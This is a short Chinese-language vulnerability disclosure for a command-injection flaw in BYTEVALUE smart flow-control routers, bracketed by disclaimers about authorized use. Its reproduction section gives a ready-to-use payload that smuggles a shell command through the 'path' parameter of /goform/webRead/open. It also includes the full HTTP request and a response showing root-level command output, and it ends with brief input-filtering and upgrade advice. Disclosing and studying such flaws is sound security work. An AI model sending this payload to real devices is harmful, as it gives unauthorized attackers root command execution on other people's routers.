本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
漏洞说明
BYTEVALUE 百为流控是一款追求完美上网体验、追求最大带宽利用率的多功能路由器,因其颠覆性的核心功能智能流控而名为百为流控路由器。
百为智能流控路由器 /goform/webRead/open 路由的 path 参数存在命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,获取服务器权限。
影响版本
BYTEVALUE 智能流控路由器
漏洞复现
payload:
/goform/webRead/open/?path=|id
请求包:
GET /goform/webRead/open/?path=%7Cid HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
响应包:
HTTP/1.0 200 OK
Server: FSM-Webs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/plain;charset=gb2312
uid=0(admin) gid=0(admin)
修复建议
严格检查参数的数据类型、数值与数据长度;过滤可能产生命令注入的特殊字符,例如:$、=、'、、||、>、-、>>、等;升级版本。
本文章仅用于学习交流,不得用于非法用途